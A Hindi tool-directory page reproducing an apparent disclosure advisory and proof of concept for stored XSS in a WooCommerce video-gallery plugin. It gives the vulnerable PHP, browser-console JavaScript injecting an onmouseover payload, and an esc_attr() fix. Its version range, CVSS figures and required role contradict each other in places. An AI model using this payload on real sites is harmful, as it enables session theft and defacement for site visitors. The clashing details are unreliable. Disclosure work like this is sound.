Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10104-POC — वूकॉमर्स के लिए उत्पाद वीडियो गैलरी <= 1.5.1.8 - प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/ravi-lk/cve-2026-10104-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubravi-lk/cve-2026-10104-poc

CVE-2026-10104-POC

वूकॉमर्स के लिए उत्पाद वीडियो गैलरी <= 1.5.1.8 - प्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
2432 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-10104: वूकॉमर्स के लिए उत्पाद वीडियो गैलरी में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग

सारांश

विवरणमान
सीवीई आईडीCVE-2026-10104
प्लगइनProduct Video Gallery for WooCommerce
विक्रेताTechnoSoft Webs (NikHiL Gadhiya)
प्रकारसंग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
CWECWE-79 — वेब पेज जनरेशन के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन
CVSS 3.14.4 (मध्यम)
प्रभावित संस्करण≤ 1.5.1.6
फिक्स्ड संस्करण1.5.1.9
प्रमाणीकरण आवश्यकहाँ — योगदानकर्ता+ (कोई भी भूमिका जो उत्पादों को संपादित कर सकती है)
द्वारा खोजा गयाRavindu Lakmina Munaweera

विवरण

वर्डप्रेस के लिए Product Video Gallery for WooCommerce प्लगइन (संस्करण 1.5.1.6 तक) custom_thumbnail उत्पाद मेटा पैरामीटर के माध्यम से संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) के प्रति संवेदनशील है।

प्लगइन का save_wc_video_url_field() तरीका sanitize_text_field() का उपयोग करके custom_thumbnail[] POST पैरामीटर को स्वच्छ करता है, जो HTML टैग हटा देता है लेकिन डबल-कोट (") वर्णों को नहीं हटाता। फ्रंटएंड पर, संग्रहीत मान को nickx_get_video_thumbanil_html() में esc_attr() एस्केपिंग के बिना सीधे एक `` टैग की विशेषताओं में डाला जाता है। यह एक प्रमाणित हमलावर को मनमाना HTML ईवेंट हैंडलर विशेषताएँ (जैसे onmouseover, onerror) इंजेक्ट करने की अनुमति देता है, जो प्रभावित उत्पाद पृष्ठ देखने वाले किसी भी आगंतुक — जिसमें अप्रमाणित उपयोगकर्ता भी शामिल हैं — के ब्राउज़र में जावास्क्रिप्ट निष्पादित करते हैं।


CVSS 3.1 वेक्टर

root@kitploit:~
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
मीट्रिकमान
हमला वेक्टरनेटवर्क
हमला जटिलताकम
आवश्यक विशेषाधिकारकम
उपयोगकर्ता सहभागिताकोई नहीं
दायरापरिवर्तित
गोपनीयता प्रभावकम
अखंडता प्रभावकम
उपलब्धता प्रभावकोई नहीं

प्रभावित कोड

सिंक (आउटपुट — कोई एस्केपिंग नहीं)

फ़ाइल: public/class-rendering.php
विधि: nickx_get_video_thumbanil_html()

root@kitploit:~
// पंक्ति 365 — मान बिना esc_attr() के डाला गया
$custom_thumbnail = isset($custom_thumbnails[$key]) && !empty($product_video_thumb_id) 
    ? 'custom_thumbnail="' . $custom_thumbnails[$key] . '"' 
    : '';

// पंक्ति 379 — सार्वजनिक फ्रंटएंड पर  टैग के अंदर रेंडर किया गया
echo '';

स्रोत (सहेजें — अपर्याप्त स्वच्छता)

फ़ाइल: admin/class-video-field.php
विधि: save_wc_video_url_field()

root@kitploit:~
// पंक्ति 309-310 — sanitize_text_field() टैग हटाता है लेकिन डबल कोट नहीं
if ( isset( $_POST['custom_thumbnail'] ) ) {
    update_post_meta( $post_id, '_custom_thumbnail', 
        array_map( 'sanitize_text_field', $_POST['custom_thumbnail'] ) );
}

प्रूफ ऑफ कॉन्सेप्ट

पूर्वापेक्षाएँ

  • वर्डप्रेस जिसमें WooCommerce स्थापित हो
  • प्लगइन: Product Video Gallery for WooCommerce ≤ 1.5.1.6
  • YouTube वीडियो URL कॉन्फ़िगर किया हुआ एक WooCommerce उत्पाद
  • उत्पाद संपादन विशेषाधिकार वाला खाता (शॉप मैनेजर, लेखक, आदि)

पुनरुत्पादन के चरण

  1. शॉप मैनेजर (हमलावर) के रूप में लॉग इन करें।

  2. उत्पाद → संपादित करें पर जाएँ और "Product Video Url" फ़ील्ड में वीडियो URL सेट किसी भी उत्पाद का चयन करें।

  3. ब्राउज़र डेवलपर टूल (F12) → कंसोल टैब खोलें।

  4. निम्नलिखित जावास्क्रिप्ट पेस्ट और निष्पादित करें:

root@kitploit:~
const form = document.getElementById('post');

// थंबनेल आईडी को एक गैर-रिक्त मान पर सेट करें (रेंडर शर्त के लिए आवश्यक)
const thumbInput = document.querySelector('input[name="product_video_thumb_url[]"]');
if (thumbInput) { thumbInput.value = '99999'; }

// custom_thumbnail के माध्यम से XSS पेलोड इंजेक्ट करें
const ct = document.createElement('input');
ct.type = 'hidden';
ct.name = 'custom_thumbnail[]';
ct.value = "yes\" onmouseover=\"alert('xss identified by Ravindu')";
form.appendChild(ct);
  1. उत्पाद को सहेजने के लिए "अपडेट" पर क्लिक करें।

  2. फ्रंटएंड पर उत्पाद पृष्ठ को गुप्त/निजी विंडो (अप्रमाणित) में खोलें।

  3. उत्पाद गैलरी में वीडियो थंबनेल पर होवर करें।

  4. ✅ जावास्क्रिप्ट अलर्ट निष्पादित होता है, जो संग्रहीत XSS की पुष्टि करता है।

छवि
छवि

रेंडर किया गया आउटपुट

root@kitploit:~

इंजेक्ट किया गया " custom_thumbnail विशेषता को बंद कर देता है, और onmouseover `` तत्व पर एक नई निष्पादन योग्य विशेषता बन जाती है।


प्रभाव

  • संग्रहीत XSS सभी आगंतुकों, जिसमें अप्रमाणित उपयोगकर्ता भी शामिल हैं, के लिए सार्वजनिक फ्रंटएंड पर निष्पादित होता है।
  • हमलावर सत्र कुकीज़ चुरा सकते हैं और व्यवस्थापक खातों का अपहरण कर सकते हैं।
  • हमलावर ग्राहकों को फ़िशिंग या मैलवेयर वितरण साइटों पर रीडायरेक्ट कर सकते हैं।
  • हमलावर उत्पाद पृष्ठों को विकृत कर सकते हैं या क्रिप्टोमाइनर इंजेक्ट कर सकते हैं।
  • शोषण के लिए केवल योगदानकर्ता-स्तर की पहुँच की आवश्यकता होती है।

उपचार

कस्टम थंबनेल मान को HTML विशेषता में डालने से पहले esc_attr() लागू करें:

root@kitploit:~
- $custom_thumbnail = isset($custom_thumbnails[$key]) && !empty($product_video_thumb_id) 
-     ? 'custom_thumbnail="' . $custom_thumbnails[$key] . '"' 
-     : '';
+ $custom_thumbnail = isset($custom_thumbnails[$key]) && !empty($product_video_thumb_id) 
+     ? 'custom_thumbnail="' . esc_attr($custom_thumbnails[$key]) . '"' 
+     : '';

यही सुधार nickx_get_video_thumbanil_html() में उन सभी उदाहरणों पर लागू किया जाना चाहिए जहाँ $custom_thumbnail बनाया गया है (दोनों ऐरे और गैर-ऐरे कोड पथ)।


प्रकटीकरण समयरेखा

दिनांकघटना
2026-03-20भेद्यता की खोज
2026-03-20Wordfence (CNA) को रिपोर्ट किया गया
2026-05-29CVE ID असाइन: CVE-2026-10104
2026-07-01सार्वजनिक प्रकटीकरण

श्रेय

  • द्वारा खोजा गया: Ravindu Lakmina Munaweera
  • CVE द्वारा असाइन: Wordfence (CNA)
  • CVE ORG

संदर्भ

  • CVE-2026-10104
  • वर्डप्रेस प्लगइन पृष्ठ
  • Wordfence भेद्यता डेटाबेस प्रविष्टि
  • CWE-79: क्रॉस-साइट स्क्रिप्टिंग
  • OWASP XSS रोकथाम चीट शीट

लाइसेंस

यह सलाह CC BY 4.0 के तहत जारी की गई है।

टूल डाउनलोड करें